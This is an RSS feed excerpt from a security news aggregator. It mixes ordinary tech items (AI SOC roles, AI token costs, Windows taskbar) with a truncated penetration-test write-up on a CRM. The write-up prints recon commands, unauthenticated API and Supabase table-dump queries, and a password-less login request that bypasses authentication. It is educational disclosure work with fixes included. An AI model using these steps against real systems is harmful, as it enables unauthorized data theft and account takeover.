<p>The post <a href="https://www.itsecuritynews.info/ai-is-transforming-enterprise-data-risk-heres-how-security-leaders-are-responding/">AI is transforming enterprise data risk. Here’s how security leaders are responding.</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I Tried to Schedule My ETL Pipeline. Here’s What I Didn’t Expect.]]></title>
<description><![CDATA[What I thought was a scheduling problem turned out to be a portability problem first
The post I Tried to Schedule My ETL Pipeline. Here’s What I Didn’t Expect. appeared first on Towards Data Science.]]></description>
<link>https://tsecurity.de/de/3610742/ai-nachrichten/i-tried-to-schedule-my-etl-pipeline-heres-what-i-didnt-expect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610742/ai-nachrichten/i-tried-to-schedule-my-etl-pipeline-heres-what-i-didnt-expect/</guid>
<pubDate>Fri, 19 Jun 2026 17:06:43 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>What I thought was a scheduling problem turned out to be a portability problem first</p>
<p>The post <a href="https://towardsdatascience.com/i-tried-to-schedule-my-etl-pipeline-heres-what-i-didnt-expect/">I Tried to Schedule My ETL Pipeline. Here’s What I Didn’t Expect.</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sorry Microsoft, Windows 10 taskbar is still better than Windows 11, and here’s why]]></title>
<description><![CDATA[After five years, Windows 11's taskbar has recovered most of what Microsoft stripped in 2021. I put both taskbars side by side on separate machines, covering repositioning, app labels, Widgets, the notification centre, and where Windows 10 still quietly wins.
The post Sorry Microsoft, Windows 10 ...]]></description>
<link>https://tsecurity.de/de/3609147/windows-tipps/sorry-microsoft-windows-10-taskbar-is-still-better-than-windows-11-and-heres-why/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609147/windows-tipps/sorry-microsoft-windows-10-taskbar-is-still-better-than-windows-11-and-heres-why/</guid>
<pubDate>Fri, 19 Jun 2026 02:10:10 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>After five years, Windows 11's taskbar has recovered most of what Microsoft stripped in 2021. I put both taskbars side by side on separate machines, covering repositioning, app labels, Widgets, the notification centre, and where Windows 10 still quietly wins.</p>
<p>The post <a rel="nofollow" href="https://www.windowslatest.com/2026/06/19/sorry-microsoft-windows-10-taskbar-is-still-better-than-windows-11-and-heres-why/">Sorry Microsoft, Windows 10 taskbar is still better than Windows 11, and here’s why</a> appeared first on <a rel="nofollow" href="https://www.windowslatest.com/">Windows Latest</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Need Java on MacOS? Here’s How to Install Java (JDK/JRE) on Mac with Eclipse Temurin]]></title>
<description><![CDATA[Need to install Java on your Mac to run a particular application? While most Mac users will never need Java, there are certain apps, development tools, enterprise software, and utilities that still require a Java Runtime Environment (JRE) or Java Development Kit (JDK) to function properly. You mi...]]></description>
<link>https://tsecurity.de/de/3608995/ios-mac-os/need-java-on-macos-heres-how-to-install-java-jdkjre-on-mac-with-eclipse-temurin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608995/ios-mac-os/need-java-on-macos-heres-how-to-install-java-jdkjre-on-mac-with-eclipse-temurin/</guid>
<pubDate>Thu, 18 Jun 2026 23:53:58 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Need to install Java on your Mac to run a particular application? While most Mac users will never need Java, there are certain apps, development tools, enterprise software, and utilities that still require a Java Runtime Environment (JRE) or Java Development Kit (JDK) to function properly. You might discover this when you go to open ... <a class="read-more" href="https://osxdaily.com/2026/06/18/need-java-on-macos-heres-how-to-install-java-jdk-jre-on-mac-with-eclipse-temurin/">Read More</a></p>
<p>The post <a href="https://osxdaily.com/2026/06/18/need-java-on-macos-heres-how-to-install-java-jdk-jre-on-mac-with-eclipse-temurin/">Need Java on MacOS? Here’s How to Install Java (JDK/JRE) on Mac with Eclipse Temurin</a> appeared first on <a href="https://osxdaily.com/">OS X Daily</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Is Finding Bugs Faster Than Enterprises Can Patch — Here’s What Data Security Teams Should Do]]></title>
<description><![CDATA[I have spent the better part of a decade building data protection products for global enterprises. Cloud DLP, CASB, SSPM, Behavior Threats, AI Access Security, ISPM, etc. The kinds of things that sit between a user, an agent, or an…
Read more →
The post AI Is Finding Bugs Faster Than Enterprises ...]]></description>
<link>https://tsecurity.de/de/3608776/it-security-nachrichten/ai-is-finding-bugs-faster-than-enterprises-can-patch-heres-what-data-security-teams-should-do/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608776/it-security-nachrichten/ai-is-finding-bugs-faster-than-enterprises-can-patch-heres-what-data-security-teams-should-do/</guid>
<pubDate>Thu, 18 Jun 2026 21:23:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>I have spent the better part of a decade building data protection products for global enterprises. Cloud DLP, CASB, SSPM, Behavior Threats, AI Access Security, ISPM, etc. The kinds of things that sit between a user, an agent, or an…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/ai-is-finding-bugs-faster-than-enterprises-can-patch-heres-what-data-security-teams-should-do/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/ai-is-finding-bugs-faster-than-enterprises-can-patch-heres-what-data-security-teams-should-do/">AI Is Finding Bugs Faster Than Enterprises Can Patch — Here’s What Data Security Teams Should Do</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Welcome to your new telco job – here’s sudo access to a database with full customer info stored in the clear]]></title>
<description><![CDATA[It happened at a major US telco in the early 2000s This article has been indexed from www.theregister.com – Articles Read the original article: Welcome to your new telco job – here’s sudo access to a database with full customer…
Read more →
The post Welcome to your new telco job – here’s sudo acc...]]></description>
<link>https://tsecurity.de/de/3607650/it-security-nachrichten/welcome-to-your-new-telco-job-heres-sudo-access-to-a-database-with-full-customer-info-stored-in-the-clear/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607650/it-security-nachrichten/welcome-to-your-new-telco-job-heres-sudo-access-to-a-database-with-full-customer-info-stored-in-the-clear/</guid>
<pubDate>Thu, 18 Jun 2026 14:09:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>It happened at a major US telco in the early 2000s This article has been indexed from www.theregister.com – Articles Read the original article: Welcome to your new telco job – here’s sudo access to a database with full customer…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/welcome-to-your-new-telco-job-heres-sudo-access-to-a-database-with-full-customer-info-stored-in-the-clear/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/welcome-to-your-new-telco-job-heres-sudo-access-to-a-database-with-full-customer-info-stored-in-the-clear/">Welcome to your new telco job – here’s sudo access to a database with full customer info stored in the clear</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[5 new security operations roles the AI-SOC will create]]></title>
<description><![CDATA[For years we’ve heard the frightening prediction that AI will take jobs away from people. It will and it already is, but that doesn’t mean it won’t also create new jobs and skills demands — like every other labor trend driven by technology advances.



Take security operations for example. Histor...]]></description>
<link>https://tsecurity.de/de/3607196/it-security-nachrichten/5-new-security-operations-roles-the-ai-soc-will-create/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607196/it-security-nachrichten/5-new-security-operations-roles-the-ai-soc-will-create/</guid>
<pubDate>Thu, 18 Jun 2026 11:23:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>For years we’ve heard the frightening prediction that AI will take jobs away from people. It will and <a href="https://www.cio.com/article/4134254/state-of-it-jobs-ai-sparks-rapidly-changing-market-for-skills.html">it already is</a>, but that doesn’t mean it won’t also create new jobs and skills demands — like every other labor trend driven by technology advances.</p>



<p>Take security operations for example. Historically, <a href="https://www.csoonline.com/article/3840447/security-operations-centers-are-fundamental-to-cybersecurity-heres-how-to-build-one.html">security operations centers (SOCs)</a> were built on a three-tier analyst model. Tier 1 analysts were junior personnel, paid to monitor activity and triage alerts. Their job was often described as “eyes-on-glass” as they tried to uncover signals among the noise. Tier 2 analysts specialized in investigating alerts (lots of them) that seemed fishy to the Tier 1 crew. When something was truly suspicious or malicious, they took remediation actions or worked with IT teams and others on incident response. Finally, Tier 3 analysts were the most senior and generally focused on threat hunting and engineering. Beyond hunting, these gurus performed deep forensic investigations, controls tuning, and <a href="https://www.csoonline.com/article/3847510/rising-attack-exposure-threat-sophistication-spur-interest-in-detection-engineering.html">detection engineering</a>.</p>



<p>Fast forward to 2026 and the <a href="https://www.csoonline.com/article/4175349/ai-becoming-an-soc-imperative-for-curtailing-emerging-cyber-threats.html">AI-SOC</a> (or the agentic SOC, autonomous SOC, human-augmented AI-SOC, etc.) is not only here but also maturing quickly. At last count, there are over 120 vendors claiming to participate in this market.</p>



<p>As of today, AI-SOC capabilities center on autonomous alert triage and basic investigations. When something looks awry — a suspicious login, an EDR alert, etc. — agents call disparate tools to enrich the alert, create a timeline of activities, produce a confidence score, and even suggest steps for remediation. Sounds like an <a href="https://www.csoonline.com/article/4163299/the-manager-of-agents-how-ai-evolves-the-soc-analyst-role.html">efficient Tier 1 analyst</a> to me.</p>



<p>In the near future, AI-SOCs will delve into Tier 2 analyst tasks with automated remediation. Additionally, agent swarms will have specialized roles for detection, investigations, remediation, and even system tuning. Some vendors also propose agents for threat hunting and continuous posture management.</p>



<p>There’s still a lot of innovation, development, and real-world testing needed, but it’s clear that agents will increasingly perform more of the heavy lifting. So where does that leave humans? Here are a few roles where cybersecurity professional skills will be needed and in high demand.</p>



<h2 class="wp-block-heading">Security data engineer</h2>



<p>AI agents can deliver value only if they have continuous access to the right data. This requires moving beyond basic SIEM parsers and API connectors. Security data engineers must know the ins-and-outs of all the data: threat intelligence, identity and access management (IAM), cloud logs, endpoint/network/application telemetry, business context, third-party access patterns, and so on.</p>



<p>All this data must fit into unified data layers that support multi-modal ingestion. This requires managing massive data pipelines to ensure context-rich, normalized, and high-fidelity logging from a potpourri of assets, cloud infrastructures, SaaS applications, and identity providers.</p>



<p>Ideally, security data engineers will transform today’s data format and API mess into cohesive data layers using standards such as the Open Cybersecurity Schema Framework (OCSF).</p>



<h2 class="wp-block-heading">AI security agent orchestrators</h2>



<p>As agent-based solutions proliferate into swarms, someone has to act as the conductor of the orchestra. This involves an understanding of how to piece together multi-agent systems while defining boundaries and guardrails, establishing memory persistence, and determining which agents can take autonomous actions and which activities still demand a human-in-the-loop.</p>



<p>Aside from technical agentic chops, AI security agent orchestrators will need a keen understanding of business-centric AI applications and workflows, as well as how all this relates to the latest threat intelligence.</p>



<h2 class="wp-block-heading">AI model trainers</h2>



<p>Rather than “set it and forget it,” AI models for security operations demand continuous updating and specific context for each individual organization based on threats, industry, and business processes.</p>



<p>AI model trainers must become adroit with <a href="https://www.infoworld.com/article/2335814/what-is-retrieval-augmented-generation-more-accurate-and-reliable-llms.html">retrieval-augmented generation (RAG)</a> to update models with local threat intelligence, asset criticality maps, new identities, and internal network architectural changes. Trainers must also be experts at fine-tuning datasets to ensure accurate and optimized results.</p>



<h2 class="wp-block-heading">AI-augmented threat hunters</h2>



<p>With AI agents in tow, threat hunting evolves from a sporadic to <a href="https://www.csoonline.com/article/4089377/fighting-ai-with-ai-adversarial-bots-vs-autonomous-threat-hunters.html">continuous activity</a>. This means moving beyond cyber threat intelligence (CTI) update triggers such as new indicators of compromise (IoCs) to focus on adversary behavioral knowledge across entire campaigns and TTPs (throughout the MITRE ATT&amp;CK framework).</p>



<p>In the near future, agents do the basic work while AI-augmented threat hunters use their experience to come up with highly sophisticated, creative, and complex attack scenarios that standard detection logic likely misses. Hunters then utilize AI to instantly write complex queries across massive datasets. The goal? Hunt for adversary intentions — sensitive data exfiltration, data encryption, etc. — rather than easy adversary tradecraft such as file hashes or IoCs.</p>



<h2 class="wp-block-heading">AI-savvy red teaming/penetration tester</h2>



<p>As AI cascades across the enterprise, SaaS applications, and third-parties, organizations will need a new breed of red teamers to discover weaknesses and gaps in enterprise AI infrastructure and applications across the software supply chain.</p>



<p>To accomplish this, <a href="https://www.csoonline.com/article/4181930/ai-red-teaming-comes-of-age.html">AI-savvy red teams</a> and penetration testers must possess the skill set and knowledge to circumvent new types of AI-enabled security defenses. Once beyond security controls, red teaming and penetration testing roles move on to <a href="https://www.csoonline.com/article/4029862/how-ai-red-teams-find-hidden-flaws-before-attackers-do.html">attack an enterprise’s internal AI deployments</a> — testing for things such as data poisoning, prompt injection vulnerabilities, and unauthorized access to underlying data stores used for building and fine-tuning various AI-models.</p>



<p>As the saying goes, “AI won’t take your job, but someone who knows how to use AI to their advantage will.” Cybersecurity professionals who follow this logic, invest in their skill sets, and pursue jobs like those described above will flourish professionally, prosper economically, and be extremely valuable to their organizations.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How companies are racing to solve the AI token problem]]></title>
<description><![CDATA[Because generative AI (genAI) tools and services have become so ubiquitous (and popular), the costs of using them are going through the roof — leading to an insatiable appetite for tokens.



Tokens represent a common way to measure and price AI use. Much like letters and words in English, large ...]]></description>
<link>https://tsecurity.de/de/3606916/it-nachrichten/how-companies-are-racing-to-solve-the-ai-token-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606916/it-nachrichten/how-companies-are-racing-to-solve-the-ai-token-problem/</guid>
<pubDate>Thu, 18 Jun 2026 09:17:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Because generative AI (genAI) tools and services have become so ubiquitous (and popular), the costs of using them are going through the roof — leading to an insatiable appetite for tokens.</p>



<p>Tokens represent a <a href="https://www.computerworld.com/article/4175277/the-world-of-ai-tokens-and-why-they-matter.html?utm=hybrid_search">common way to measure and price AI use</a>. Much like letters and words in English, large language models (LLMs) grasp a sentence or query by breaking words into tokens.</p>



<p>With the AI explosion well under way, tokens are now “the fundamental units of data our models process, many representing a problem being solved,” according to Google CEO Sundar Pichai. (Google, by the way, processes about 3.2 quadrillion tokens a month.)</p>



<p>But as the price of all those tokens adds up, business and IT execs are looking for ways to cut costs while keeping corporate productivity up. Uncontrolled token use has already landed one company with an <a href="https://www.axios.com/2026/05/28/ai-spending-roi-enterprise-costs" target="_blank" rel="noreferrer noopener">unexpected $500 million AI bill</a>. </p>



<p>There are a number of ways companies can rein in the price of AI at the model, infrastructure, silicon, and business levels. Here’s a look at how some of those savings might actually be achieved.</p>



<h2 class="wp-block-heading">Switch to lower-cost models</h2>



<p>One way of potentially saving money is by re-routing AI work to a cheaper model, Pichai said. At Google that would <a href="https://www.computerworld.com/article/4175283/google-is-focusing-on-autonomous-ai-agents-in-gemini-3-5-flash.html">Gemini 3.5 Flash</a>. It delivers “frontier-level capabilities at less than half the price of comparable frontier models.</p>



<p>“If companies use a mix of [Gemini 3.5] Flash and other frontier models, they could save a lot of money,” Pichai said.</p>



<p>Those kinds of models provide cheaper tokens, with reasoning that’s good enough for many users — if not as strong as mainstream Gemini 3.5 — to deliver useful results.</p>



<p>“There is sometimes overkill with the [LLMs],” said Deepak Seth, senior director analyst at Gartner. “I don’t always need a large language model which has been trained on the works of Charles Dickens and Shakespeare and <em>Harry Potter</em>.”</p>



<p>Hyperframe Research principal analyst Steven Dickens can’t stop using Amazon’s Quick, which costs $20 a month, for personal tasks. “It is great personal ROI as it has not only made tasks faster, but unlocked tasks I would never have even attempted previously,” Dickens said.</p>



<h2 class="wp-block-heading">Don’t forget the hardware and software part of the equation</h2>



<p>The token crisis isn’t new, said <a href="https://en.wikipedia.org/wiki/Dheeraj_Pandey" target="_blank" rel="noreferrer noopener">Dheeraj Pandey</a>, CEO of <a href="https://devrev.ai/" target="_blank" rel="noreferrer noopener">DevRev</a>, who likens what’s going on now in the AI market to the disruptions that emerged with the arrival of cloud computing and virtualization years ago. </p>



<p>“We let chaos reign and then we had to rein in the chaos,” Pandey said. “The word that people started using was server consolidation and virtualization.”</p>



<p>The answer to the token problem, he said, is the same: “Anything in systems can be solved with caching and indirection.”</p>



<p>DevRev, for example, is building a memory layer between AI agents and primary data sources, such as Salesforce or ERP records; that can cut token load and make data movement more efficient. The layer holds a knowledge graph with answers to common agent questions and runs on cheaper CPUs, avoiding more costly GPU cycles.</p>



<p>Sending agents straight at systems like ServiceNow and Salesforce “will burn a lot more tokens. It’s also not precise. And finally, it’s not safe enough where I can roll it back in case an agent has committed a mistake,” Pandey said.</p>



<p>Network automation firm NetBrains uses a different method: It uses conventional computing to map a network’s layout then feeds only key information to models for planning and reasoning, where AI excels. “So you don’t have to spend all the tokens,” said Netbrains CTO Sang Peng.</p>



<h2 class="wp-block-heading">Focus on prompt efficiency</h2>



<p>Staffing firm ManpowerGroup has found that prompt efficiency can be an effective tool for improving token use, both internally and externally for clients.</p>



<p>For example, users accessing its internal labor-market tool initially needed 10 follow-up questions to drill into a query. A year later, more efficient use of prompts has brought that number down to an average of four, said <a href="https://www.linkedin.com/in/maxleaming" target="_blank" rel="noreferrer noopener">Max Leaming</a>, head of data science and AI solutions at ManpowerGroup. </p>



<p>“They’re using fewer tokens and they’re simply more efficient,” he said. “And that in large part has to do with your ability to prompt efficiently.”</p>



<h2 class="wp-block-heading">Go local</h2>



<p>New AI hardware that generates free tokens at home could ease some of the cost crisis.</p>



<p>At <a href="https://www.nvidia.com/en-tw/gtc/taipei/" target="_blank" rel="noreferrer noopener">GTC Taipei</a> earlier this month, Nvidia and Microsoft unveiled RTX Spark, an agentic AI desktop PC that runs agents and 120-billion-parameter models locally on Windows. The goal is “to deliver unmetered intelligence to every home and every desk with Windows,” <a href="https://nvidianews.nvidia.com/news/nvidia-microsoft-windows-pcs-agents-rtx-spark" target="_blank" rel="noreferrer noopener">Microsoft CEO Satya Nadella said in a statement</a>.</p>



<p>Some companies are looking to reduce cloud AI costs by putting their own hardware in data centers, with vendors such as HPE and Dell providing servers installed in independent facilities. (On-premise AI is gaining ground amid sovereign AI and geopolitical concerns, including the recent conflict in the Middle East, where large data centers were struck with missiles.)</p>



<p>“There are local, region-specific and multiple vendor AI solutions. All of those things can help mitigate the risk. But they’re not going to eliminate it,” said Max Goss, senior director analyst at Gartner.</p>



<h2 class="wp-block-heading">Use forward-deployed engineers</h2>



<p>Reducing token costs is something that may fall to <a href="https://www.computerworld.com/article/4171867/heres-one-career-emerging-from-the-ai-shift-forward-deployed-engineers.html">forward-deployed engineers</a> (FDEs) in customer environments, said <a href="https://www.linkedin.com/in/taimurrashid" target="_blank" rel="noreferrer noopener">Taimur Rashid</a>, managing director of AWS’s Generative AI Innovation Center.</p>



<p>“I expect these teams to be able to architect systems that have those cost requirements in mind, whether it’s use a different model or a different use case that doesn’t increase the per-token cost,” Rashid said.</p>



<p>Companies may spend heavily on token consumption, “but if you’re generating revenue, as long as the economics work out, then you’re at peace,” Rashid said.</p>



<p>The use of FDEs is gaining ground as IT decision-makers look to both <a href="https://www.computerworld.com/article/4180088/ai-vendor-fdes-key-considerations-and-concerns.html?utm=hybrid_search">rollout successful AI deployments while also keeping an eye on costs</a>.</p>



<h2 class="wp-block-heading">Change the measure of success from tokens to outcomes</h2>



<p>Even with the current emphasis on reducing token use to save money, the metrics used to measure AI success are likely to shift, Gartner’s Seth said. At some point, token-based pricing will move more toward an outcome-based model, where the unit of value is outcomes, not fragments of words.</p>



<p>“Some companies are moving towards outcome-based pricing,” Seth said. “When people start realizing the real cost of tokens, then companies will start looking at token efficiency.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[I Pentested a Real CRM System and Found 4 Critical Vulnerabilities — Here’s the Full Attack Chain]]></title>
<description><![CDATA[Author: Shikhali JamalzadeGitHub: github.com/alisalive LinkedIn: linkedin.com/in/camalzadsDisclosure Notice: This assessment was conducted with explicit written authorization from the organization’s CEO and senior leadership. All sensitive details — including the target domain, company name, Supa...]]></description>
<link>https://tsecurity.de/de/3606858/hacking/i-pentested-a-real-crm-system-and-found-4-critical-vulnerabilities-heres-the-full-attack-chain/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606858/hacking/i-pentested-a-real-crm-system-and-found-4-critical-vulnerabilities-heres-the-full-attack-chain/</guid>
<pubDate>Thu, 18 Jun 2026 08:51:22 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*kIqGy9rC6ealvMq7E-VNtg.png"></figure><h4><strong>Author:</strong> <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a><br><strong>GitHub:</strong> <a href="https://github.com/alisalive">github.com/alisalive</a> <br><strong>LinkedIn:</strong> <a href="https://linkedin.com/in/camalzads">linkedin.com/in/camalzads</a></h4><blockquote><strong><em>Disclosure Notice:</em></strong><em> This assessment was conducted with explicit written authorization from the organization’s CEO and senior leadership. All sensitive details — including the target domain, company name, Supabase project identifiers, API keys, credentials, user email addresses, and personal data — have been redacted or anonymized in this write-up. No sensitive information was retained after reporting. This write-up is published strictly for educational purposes.</em></blockquote><h3>Background</h3><p>A few weeks ago, my instructor handed me a task: <em>“Pentest our internal CRM platform. You have full authorization — everything except DDoS.”</em></p><p>It was a real, live production system. A Next.js application backed by Supabase/PostgreSQL, used by instructors, support staff, and admins to manage students, leads, payments, and internal communications. Real people. Real data.</p><p>I expected maybe one or two interesting findings. What I found instead was a complete, unobstructed path from zero knowledge to full database dump — without ever needing a username or password. And by the time I got deep enough into the database, I realized I wasn’t the first person to find this.</p><p>This is the story of that assessment.</p><h3>Scope &amp; Rules of Engagement</h3><p><strong>Target:</strong> Internal CRM web application (production) <strong>Stack:</strong> Next.js (SSR), Supabase/PostgreSQL, nginx <strong>Assessment Type:</strong> Black-Box Web Application Penetration Test <strong>Authorization:</strong> CEO + Senior Instructors (written) <strong>Exclusions:</strong> DDoS / Denial of Service <strong>Tools:</strong> Burp Suite Pro, Nmap, ffuf, feroxbuster, subfinder, whatweb, curl</p><h3>Phase 1: Reconnaissance</h3><p>I started the way I always do — passive recon, then active enumeration.</p><pre># Port scan<br>nmap -sC -sV -oN nmap/target.txt &lt;TARGET_IP&gt;</pre><pre># Subdomain enumeration<br>subfinder -d &lt;TARGET_DOMAIN&gt; -o subdomains.txt</pre><pre># Technology fingerprinting<br>whatweb https://&lt;TARGET_DOMAIN&gt;</pre><p><strong>Nmap results:</strong></p><pre>22/tcp  open  ssh     OpenSSH (Ubuntu)<br>80/tcp  open  http    nginx/1.24.0 (Ubuntu) → redirect to HTTPS<br>443/tcp open  https   nginx/1.24.0</pre><p>Whatweb and browser analysis confirmed:</p><ul><li><strong>Framework:</strong> Next.js (SSR) — Build ID visible in page source</li><li><strong>Server:</strong> nginx/1.24.0 on Ubuntu Linux</li><li><strong>Auth UI:</strong> Custom login form at /[locale]/login</li></ul><p>Nothing immediately exploitable. Time to dig deeper.</p><h3>Phase 2: Mapping the Attack Surface</h3><h3>Directory &amp; API Endpoint Discovery</h3><pre>feroxbuster -u https://&lt;TARGET&gt; -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt \<br>  -x js,json,php -mc 200,301,302,401,403,405</pre><p>Interesting endpoints discovered:</p><pre>/api/health          → 200 OK<br>/api/tickets         → 200 OK   ← wait, what?<br>/api/search?q=*      → 200 OK<br>/api/dashboard       → 200 OK<br>/api/broadcast       → 421 Misdirected Request</pre><p>I stared at /api/tickets for a second. This endpoint had no authentication requirement visible from the URL. I fired a raw curl at it without any session cookie or token:</p><pre>curl -s https://&lt;TARGET&gt;/api/tickets</pre><p>The response came back instantly: a full JSON array of ticket records. Names, descriptions, internal notes. No token. No session. Nothing.</p><p>That’s when I knew this was going to be a serious engagement.</p><h3>Next.js Bundle Analysis</h3><p>Next.js bundles its routing and configuration into static JavaScript files served to all visitors. I pulled the build manifest:</p><pre>/_next/static/&lt;BUILD_ID&gt;/_buildManifest.js</pre><p>Inside the bundles, I found references to multiple internal routes, API paths, and — more importantly — environment variables that had leaked into the client-side JavaScript. One of them was a Supabase configuration block.</p><h3>Phase 3: Vulnerability Identification &amp; Exploitation</h3><h3>V-01 — Broken Access Control: Unauthenticated API Access [CRITICAL | CVSS 9.8]</h3><p><strong>CWE-284 — Improper Access Control</strong></p><p>Multiple API endpoints returned full JSON data with no authentication whatsoever. I tested each one with zero credentials:</p><pre># All of these returned HTTP 200 with full data — no token, no cookie, nothing<br>curl https://&lt;TARGET&gt;/api/tickets<br>curl https://&lt;TARGET&gt;/api/search?q=*<br>curl https://&lt;TARGET&gt;/api/dashboard<br>curl https://&lt;TARGET&gt;/api/health</pre><p>The /api/dashboard endpoint returned aggregated business metrics — student counts, revenue summaries, lead pipeline data — all publicly accessible.</p><p>The /api/health endpoint returned the Node.js runtime version and server uptime. Minor on its own, but useful for a targeted attacker.</p><p><strong>Impact:</strong> Complete confidentiality breach of all application data without any prior access.</p><h3>V-02 — Exposed Supabase Anon API Key in Client-Side JavaScript [CRITICAL | CVSS 9.1]</h3><p><strong>CWE-522 — Insufficiently Protected Credentials</strong></p><p>This was the finding that opened everything else.</p><p>While analyzing intercepted requests in Burp Suite, I noticed the browser was making direct calls to a *.supabase.co subdomain. The requests included an apikey header — and that key was coming directly from the JavaScript bundle served to any visitor.</p><pre>Host: [REDACTED].supabase.co<br>apikey: [REDACTED — JWT token with role: "anon", expiry: year 2091]<br>Authorization: Bearer [SAME REDACTED KEY]</pre><p>The key had a <strong>year 2091 expiry</strong>. Effectively permanent.</p><p>Supabase exposes a PostgREST API — an HTTP interface that maps directly to PostgreSQL tables. With this key and no Row Level Security (RLS) policies enabled, I had direct read access to the entire database. No authentication. No privilege escalation. Just a key that was sitting in the JavaScript any visitor could download.</p><pre># Direct Supabase PostgREST queries — all returned HTTP 200<br>GET /rest/v1/users?select=*            → 38 user records (including plaintext passwords)<br>GET /rest/v1/leads?select=*            → 39 lead records (names, emails, phone numbers, deal values)<br>GET /rest/v1/payments?select=*         → 31 payment and invoice records<br>GET /rest/v1/courses?select=*          → Course catalog with pricing and instructor assignments<br>GET /rest/v1/instructor_notes?select=* → 29 private instructor notes<br>GET /rest/v1/chats?select=*            → Internal chat messages<br>GET /rest/v1/schedule_events?select=*  → 30 schedule entries<br>GET /rest/v1/automations?select=*      → Business automation rules and triggers</pre><p>I had just dumped the entire database from the browser.</p><p><strong>The root cause:</strong> The Supabase anon key was embedded in the client-side JavaScript bundle and all Supabase tables had Row Level Security disabled — meaning the anon role had unrestricted read access to every table.</p><p><strong>Impact:</strong> Complete, unauthenticated exfiltration of all user data, financial records, PII, internal communications, and business logic.</p><p><strong>What should have happened:</strong></p><ul><li>The anon key should never appear in client-side code</li><li>All Supabase tables must have RLS policies enabled</li><li>API keys must live in server-side environment variables only, acting as a proxy layer</li></ul><h3>V-03 — Plaintext Password Storage [CRITICAL | CVSS 9.0]</h3><p><strong>CWE-256 — Plaintext Storage of a Password</strong></p><p>When I queried the users table, the response included a password field. Not a hash. Not a bcrypt output. The actual plaintext password for every single account.</p><pre>{<br>  "email": "[REDACTED]@[REDACTED].edu.az",<br>  "role": "SUPER_ADMIN",<br>  "password": "[REDACTED]"<br>}</pre><p>38 user records. All roles. All passwords. Visible, readable, immediately usable.</p><p>I won’t detail the specific credentials here — they have since been reported and the organization has been notified. But the breakdown included SUPER_ADMIN, INSTRUCTOR, SUPPORT, and STUDENT roles — the entire user hierarchy.</p><p><strong>The cascading impact of this finding:</strong> Because passwords were plaintext, anyone who accessed the database (via V-02 or any future breach) immediately has working credentials for every account. No cracking. No GPU farms. Just copy-paste.</p><p>Additionally, if any user reuses these passwords on external services — email, banking, other platforms — those are now exposed too.</p><p><strong>What should have happened:</strong></p><ul><li>Passwords must be hashed using bcrypt (cost ≥ 12), scrypt, or Argon2id before storage</li><li>The password field must never be returned in any API response — not even to admins</li><li>Supabase Auth (GoTrue) handles this by default; custom auth flows should never store plaintext</li></ul><h3>V-04 — Authentication Bypass: Optional Password Field [CRITICAL | CVSS 9.8]</h3><p><strong>CWE-287 — Improper Authentication</strong></p><p>At this point I had all user emails from the database. But I wanted to test whether I actually needed the passwords at all.</p><p>I logged into Burp Suite Repeater, captured a normal login request, and removed the password field entirely:</p><pre>POST /api/login HTTP/2<br>Host: [REDACTED]<br>Content-Type: application/json</pre><pre>{"email": "[REDACTED_ADMIN_EMAIL]"}</pre><p>The server accepted it.</p><p>No password. No error. The application processed the request as a valid authentication attempt.</p><p><strong>Why this happens:</strong> The login handler likely performs a database lookup by email and, if no password is provided, the comparison logic returns true or null (falsy check passes) rather than throwing a validation error. A single missing server-side check — if (!password) return 400 — would have prevented this entirely.</p><p><strong>Combined impact with V-01 and V-02:</strong> An attacker can enumerate all user emails from the unauthenticated API, then bypass authentication for any account using just the email address. No password knowledge required at any 